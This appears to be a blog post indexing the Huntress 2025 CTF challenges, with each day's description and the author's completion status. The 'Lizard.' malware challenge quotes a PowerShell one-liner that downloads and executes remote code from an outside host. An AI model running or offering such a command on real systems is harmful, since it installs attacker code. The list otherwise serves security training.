Huntress 2025 Cyber Awareness Month CTF

DezeStijn

Intro

Partaking in the annual tradition of turning October into the Cyber(security) Awareness Month (beware of acronyms!), Huntress organised a month-long CTF challenge, releasing a (or multiple) new challenge(s) every day.

The challenges covered a wide range of types and difficulty levels, allowing both newcomers to enjoy solving a few challenges as well as giving experienced players a hard time every now and then.

I collected all my CTF notes in a GitHub repository. That should make it easier to follow what my process(?) looked like, or at least kind of.

Sadly, I didn’t manage to complete all challenges, which does mean I won’t have a write-up for all 31 days’ worth of challenges. For that, I refer you to the write-ups of other participants and/or the challenge owners.

Below is a list of all the CTF challenges together with their category and description. I’ve marked which ones I’ve (partially) completed. The notes themselves can be found on GitHub.

Day 01

Read the Rules - COMPLETED

Category: ℹ️ Information
Author: John Hammond

Please follow the rules for the Huntress CTF!

Read the rules at https://ctf.huntress.com/rules

If you look closely, you can find a flag!

Technical Support - COMPLETED

Category: ℹ️ Information
Author: John Hammond

Want to join the party of GIFs, memes and emoji shenanigans? Or just want to ask a question for technical support regarding any challenges in the CTF? Be sure to join the Huntress CTF Discord server.

This CTF uses support tickets within Discord to help handle requests.

If you need assistance, please create a ticket with the #ctf-open-ticket channel. You do not need to direct message any CTF organizers or facilitators, they will just tell you to open a ticket. You might find a flag in the ticket channel, though!

Join the Discord!

Spam test - COMPLETED

Category: 👶 Warmups
Author: John Hammond

Time to do some careful Googling… what’s the MD5 hash of the Generic Test for Unsolicited Bulk Email (GTUBE) string?

Submit the hash wrapped within the flag{ prefix and } suffix to match the standard flag format.

Cover All Your Bases - COMPLETED

Category: 👶 Warmups
Author: John Hammond

Can you make sense of all the different data below? Each one has a different representation!

Uncover the appropriate plaintext and submit the flags below! Do you know what all these ones and zeros mean?

Binary

Uncover the appropriate plaintext and submit the flags below! Do you know what all these ones and zeros mean?

Octal

Hmmm, a group of triplets, it looks like. Can you find out what they are trying to say?

Decimal

These numbers look familiar… but how could they be represented as text?

Hexadecimal

These look like pairs! But these have weird letters in them?

Base32

Uppercase letters and digits in a long stream…. notice anything about the padding?

Base45

A mixed alphabet with symbols. What is this one supposed to be?

Base64

Compact and common on the wire… does the ending give you a clue?

Base85

This variant often shows special markers. See anything bracketing the data?

Base92

This noisy alphabet is picky about whitespace… formatting might matter!

Base65536

The data below looks super weird! Don’t panic if your editor can’t render every symbol. Can you tell what it is?

Just a Little Bit - COMPLETED

Category: 👶 Warmups
Author: John Hammond

If just a little bit were to go missing… would it really even matter?

QRception - COMPLETED

Category: 👶 Warmups
Author: John Hammond

Wow, that’s a big QR code! I wonder what it says!

RFC 9309 - COMPLETED

Category: 👶 Warmups
Author: John Hammond

Sorry. You know every CTF has to have it. 🤷

Verify You Are Human - COMPLETED

Category: 🐞 Malware
Author: John Hammond

My computer said I needed to update MS Teams, so that is what I have been trying to do…

…but I can’t seem to get past this CAPTCHA!

CAUTION

This is the Malware category. Please be sure to approach this challenge material within an isolated virtual machine.

NOTE

Some components of this challenge may be finicky with the browser-based connection. You can still achieve what you need to, but there may be some more extra steps than if you were to approach this over the VPN.

(i.e., “remove the port” when you need to… you’ll know what I mean 😜)

Day 02

OFA - COMPLETED

Category: 👶 Warmups
Author: Matt Kiely (HuskyHacks)

Two factors? In this economy??!!

Spaghetti - COMPLETED

Category: 🐞 Malware
Author: John Hammond

You know, I’ve been thinking… at the end of the day, spaghetti is really just strings of pasta!

Anyway, we saw this weird file running on startup. Can you figure out what this is?

I’m sure you’ll get more understanding of the questions below as you explore!

CAUTION

This is the Malware category, and as such, includes malware. Please be sure to analyze these files within an isolated virtual machine.

IMPORTANT

The ZIP archive password is infected.

NOTE

You may find a public paste URL that is expired. This is an artifact of the original malware sample and is intentional. This URL is not necessary for the challenge.

MainFileSettings

Uncover the flag within the “main file.”

NOTE

Once you uncover the intended payload, you shouldn’t need to do any further analysis. Use context clues from the challenge description and you should find the flag.

My Fourth Oasis

Uncover the flag within “my fourth oasis.”

MEMEMAN

Uncover the flag beside “MEMEMAN.”

Day 03

Maximum Sound - NOT FOUND

Category: 👶 Warmups
Author: John Hammond

Dang, this track really hits the target! It sure does get loud though, headphone users be warned!!

SANDY - PARTIALLY

Category: 🐞 Malware
Author: John Hammond

My friend Sandy is really into cryptocurrencies! She’s been trying to get me into it too, so she showed me a lot of Chrome extensions I could add to manage my wallets. Once I got everything sent up, she gave me this cool program!

She says it adds better protection so my wallets can’t get messed with by hackers.

Sandy wouldn’t lie to me, would she…? Sandy is the best!

CAUTION

This is the Malware category, and as such, includes malware. Please be sure to analyze these files within an isolated virtual machine.

The password to the archive is infected.

Day 04

ARIKA - COMPLETED

Category: 🌐 Web
Author: John Hammond

The Arika ransomware group likes to look slick and spiffy with their cool green-on-black terminal style website… but it sounds like they are worried about some security concerns of their own!

NOTE

The password for the ZIP archive below is arika.

Snooze - COMPLETED

Category: 👶 Warmups
Author: John Hammond

Don’t bug me, I’m sleeping! Zzzz… zzz… zzzz….

Uncover the flag from the file presented.

Day 05

Sigma Linter - PARTIALLY

Category: 🌐 Web
Author: John Hammond

Oh wow, another web app interface for command-line tools that already exist!

This one seems a little busted, though…

Day 06

Emotional - COMPLETED

Don’t be shy, show your emotions! Get emotional if you have to! Uncover the flag.

Day 07

Trust Me - COMPLETED

Category: 📦 Miscellaneous
Author: John Hammond

C’mon bro, trust me! Just trust me!! Trust me bro!!!

The TrustMe.exe program on this Windows desktop “doesn’t trust me?”

It says it will give me the flag, but only if I “have the permissions of Trusted Installer”…?

If you are using the VPN, you can RDP to this challenge with:

Username: Administrator
Password: h$4#82PSK0BUBaf7

NOTE

This virtual machine does not have Internet access.

Day 08

Flag Checker - COMPLETED

Category: 🌐 Web
Author: @Soups71

We’ve decided to make this challenge really straight forward. All you have to do is find out the flag!

Juuuust make sure not to trip any of the security controls implemented to stop brute force attacks…

NOTE

Working this challenge may be difficult with the browser-based connection alone. We again recommend you use the direct IP address over the VPN connection.

IMPORTANT

Restarting the instance repeatedly is not required for solving this challenge. If you find yourself doing this, it may be worth reevaluating your strategy.

Day 09

Tabby’s Date

Category: 🔍 Forensics
Author: John Hammond

Ohhhh, Tab, Tab, Tab…. what has she done.

My friend Tabby just got a new laptop and she’s been using it to take notes. She says she puts her whole life on there!

She was so excited to finally have a date with a boy she liked, but she completely forgot the details of where and when. She told me she remembers writing it in a note… but she doesn’t think she saved it!!

She shared with us an export of her laptop files.

NOTE

The password to the ZIP archive is tabbys_date.

Can you help us find the details of Tab’s date?

Day 10

For Greatness

Category: 🐞 Malware
Author: John Hammond

Oh great, another phishing kit. This has some functionality to even send stolen data over email! Can you track down the email address they send things to?

CAUTION

This is the Malware category, and as such, includes malware. Please be sure to analyze these files within an isolated virtual machine.

The password to the archive is infected. Uncover the flag from the file provided.

Day 11

Trashcan

Category: 🔍 Forensics
Author: John Hammond

Have you ever done forensics on the Recycle Bin? It’s… a bit of a mess. Looks like the threat actor pulled some tricks to hide data here though.

The metadata might not be what it should be. Can you find a flag?

Day 12

Angler - PARTIALLY

Category: 📦 Miscellaneous
Author: Tim Sword

These scribbles are impossible to read!

42 6c 6f 77 66 69 73 68

Some crazy fisherman came by, dropped this note, and was muttering something in his drunken stupor, about his fishing pole and taking out… murlocs in Entra? and CyberChef!?

I don’t get it. You’re the expert here! Not me!

WARNING

This challenge is designed for you to have a look around using enumeration tooling and emphasises thinking “outside the box”, versus challenging your ability to ‘pwn’ the tenant. Please do not sabotage the challenge!

MFA is intended for this challenge. If you cannot sign in, try a different way.

This challenge uses flags that are not in the standard format of flag{[MD5HASH]}. You will find flags with the flag{ prefix and } suffix, but a short alphanumeric string with some special characters wrapped inside the curly braces.

What is the FINAL flag? This flag is unlike the others and ends with a ? character.

NOTE

This challenge also includes some “bonus flags” along the way that are still worth some points.

  • Submit the bonus flag that ends with the character 2.
  • Submit the bonus flag that ends with the character d.
  • Submit the bonus flag that ends with the character a.
  • Submit the bonus flag that ends with the character m.
  • Submit the bonus flag that ends with the character c.

Day 13

I Forgot

Category: 🔍 Forensics
Author: John Hammond

So…. bad news.

We got hit with ransomware.

And… worse news… we paid the ransom.

After the breach we FINALLY set up some sort of backup solution… it’s not that good, but, it might save our bacon… because my VM crashed while I was trying to decrypt everything.

And perhaps the worst news… I forgot the decryption key.

Gosh, I have such bad memory!!

CAUTION

⚠️ This file was produced from a fresh Windows installation. Included within that are some antivirus signature strings and artifacts that may include profanity or unsettling language. Please be advised these remnants exist, but they are not part of the challenge.

NOTE

The archive password is i_forgot.

Day 14

Beyblade

Category: 🔍 Forensics
Author: John Hammond

Sheesh! Some threat actor sure did let it rip on this host! We’ve been able to uncover a file that may help with incident response.

NOTE

The password to the ZIP archive is beyblade. This challenge has the flag MD5 hash value separated into chunks. You must uncover all of the different pieces and put them together with the flag{ and } suffix to submit.

Day 15

Phasing Through Printers

Category: 📦 Miscellaneous
Author: @Soups71

I found this printer on the network, and it seems to be running… a weird web page… to search for drivers?

Here is some of the code I could dig up.

NOTE

Escalate your privileges and uncover the flag in the root user’s home directory.

IMPORTANT

The password to the ZIP archive below is phasing_through_printers.

Day 16

Threat Actor Support Line

Category: 📦 Miscellaneous
Author: John Hammond

You’ve heard of RaaS, you’ve heard of SaaS… the Threat Actor Support Line brings the two together!

Upload the files you want encrypted, and the service will start up its own hacker computer (as the Administrator user with antivirus disabled, of course) and encrypt them for you!

WARNING

Some players have reported that while researching material that might help them with this challenge, they have discovered some public malicious Github repositories that embed malware under the guise of a tool or utility. These are external to the Huntress CTF, and while there is always potential for malware in outside/untrusted software, please exercise caution if you explore unknown third-party resources.

Day 17

vx-underground

Category: 📦 Miscellaneous
Author: John Hammond

vx-underground, widely known across social media for hosting the largest collection and library of cat pictures, has been plagued since the dawn of time by people asking: “what’s the password?”

Today, we ask the same question. We believe there are secrets shared amongst the cat pictures… but perhaps these also lead to just more cats.

Uncover the flag from the file provided.

Day 18

Bussing Around

Category: 🔍 Forensics
Author: @Soups71

One of the engineers noticed that an HMI was going haywire.

He took a packet capture of some of the traffic but he can’t make any sense of it… it just looks like gibberish!

For some reason, some of the traffic seems to be coming from someone’s computer. Can you help us figure out what’s going on?

Day 19

XMDR

Category: 📦 Miscellaneous
Author: John Hammond

We had a lot of fun helping the Internet understand what MDRs are, but we thought of the next best thing: why not have you use one! 😄

A host that you protect had some strange alerts fire off… can you analyze and triage to find other malicious activity?

Day 20

Darcy - COMPLETED

Category: 🔍 Forensics
Author: John Hammond

Darcy has apparently been having a lot of fun with a unique version control system.

She told me she hid a flag somewhere with her new tool and wants me to find it… I can’t make any sense of it, can you?

Day 21

Follow The Money - COMPLETED

Category: 🕵️ OSINT
Author: @Brady

Hey Support Team,

We had a bit of an issue yesterday that I need you to look into ASAP. There’s been a possible case of money fraud involving our client, Harbor Line Bank. They handle a lot of transfers for real estate down payments, but the most recent one doesn’t appear to have gone through correctly.

Here’s the deal, we need to figure out what happened and where the money might have gone. The titling company is looping in their incident response firm to investigate from their end. I need you to quietly review things on our end and see what you can find. Keep it discreet and be passive.

I let Evelyn over at Harbor Line know that someone from our team might reach out. Her main email is offline right now just in case it was compromised, she’s using a temporary address until things get sorted out:

evelyn.carter@51tjxh.onmicrosoft.com

IMPORTANT

This challenge uses a non-standard flag format.

NOTE

The password to the ZIP archive below is follow_the_money.

Day 22

NimCrackMe1

Category: ⚙️ Reverse Engineering
Author: @JohnHammond

I just really like Nim, okay, I think it’s neat.

(Could very well be used by threat actors too, so it’s worth getting a feel for some Nimlang reverse engineering!)

Webshellz

Category: 🔍 Forensics
Author: Ben Folland

The sysadmin reported that some unexpected files were being uploaded to the file system of their IIS servers.

As a security analyst, you have been tasked with reviewing the Sysmon, HTTP, and network traffic logs to help us identify the flags!

NOTE

The password to the ZIP archive is webshellz

Day 23

Rust Tickler

Category: ⚙️ Reverse Engineering
Author: @Nordgaren

Ooooh Rust! AND tickles? Rusty tickles…?

Day 24

Lizard. - COMPLETED

Category: 🐞 Malware
Author: Adam Rice

Erm, what the sigma?

We saw this strange PowerShell string on one of our hosts, can you investigate and figure out what this does?

irm biglizardlover.com/gecko | iex

CAUTION

This is the Malware category, and as such, includes malware.

Please be sure to analyze these files within an isolated virtual machine.

Day 25

My Hawaii Vacation

Category: 🐞 Malware
Author: John Hammond

Oh jeeeez… I was on Booking.com trying to reserve my Hawaii vacation.

Once I tried verifying my ID, suddenly I got all these emails saying that my password was changed for a ton of different websites!! What is happening!?!

I had a flag.txt on my desktop, but that’s probably not important…

Anyway, I still can’t even finish booking my flight to Hawaii!! Here is the site I was on… can you get this thing to work!??!

CAUTION

This is the Malware category, and as such, includes malware. Please be sure to analyze these files within an isolated virtual machine.

Day 26

Puzzle Pieces Redux - COMPLETED

Category: 🔍 Forensics
Author: @Nordgaren

Well, I accidentally put my important data into a bunch of executables… just don’t ask, okay?

It was fine… until my cat Sasha stepped on my keyboard and messed everything up! OH NOoOoO00!!!!!111

Can you help me recover my important data?

Day 27

Follow The Money: The Sequel - COMPLETED

Category: 🕵️ OSINT
Author: @Brady

WARNING

The initial Follow the Money challenge should be completed first before this challenge.

Hey Support Team,

Thanks for your help the other day! After seeing the way you handled yourself and gathered these details, I wanted to see if I could get a bit more help from you. I know you found their username the other day. See what you can do with that. I need you to find the town that this hacker lives in. I don’t think the IR firm is doing enough. I want to have every piece of information we can find. Maybe we can pay a visit. Let me know what you find. Thanks!

IMPORTANT

This challenge DOES NOT require you to contact any businesses. This can be fully solved with publicly available information. Being that this is OSINT and public-facing, please DO NOT do anything to disrupt other CTF players or others that are not involved with the CTF.

IMPORTANT

This challenge uses a non-standard flag format.

Day 28

Rust Tickler 2

Category: ⚙️ Reverse Engineering
Author: @Nordgaren

You all looked like you were having so much fun reverse engineering Rust code… why not do it again!?

Telestealer

Category: 🐞 Malware
Author: Ben Folland

Our threat intelligence team reported that Ben’s data is actively being sold on the dark web. During the incident response, the SOC identified a suspicious JavaScript file within Ben’s Downloads folder.

Can you recover the stolen data?

NOTE

The password to the ZIP archive is telestealer

Day 29

Trapped

Category: ⚒️ Binary Exploitation
Author: Wittner

Well… I’m trapped. Feels like I’m in jail. Can you get the flag?

NOTE

The flag is in the root directory at /flag.txt

CAUTION

This challenge intentionally has no browser-based connection. You must use the VPN connection to access this challenge, listening on port 9999. Please use the challenge IP address as the host to connect to with netcat.

nc $CHALLENGE_IP_ADDRESS 9999

Day 30

Rust Tickler 3

Category: ⚙️ Reverse Engineering
Author: @Nordgaren

It’s back. Good luck.

No Limits

Category: ⚒️ Binary Exploitation
Author: Wittner

Even when you only have a few options, don’t let anything hold you back!

NOTE

The flag is in the root directory at /flag.txt

CAUTION

This challenge intentionally has no browser-based connection. You must use the VPN connection to access this challenge, listening on port 9999. Please use the challenge IP address as the host to connect to.

nc $CHALLENGE_IP_ADDRESS 9999

Day 31

Root Canal

Category: 📦 Miscellaneous
Author: Matt Kiely (HuskyHacks)

But what is the real root of the issue?

If you are using the VPN, you can SSH in to this challenge with:

Username: ctf
Password: HuntressCTF2025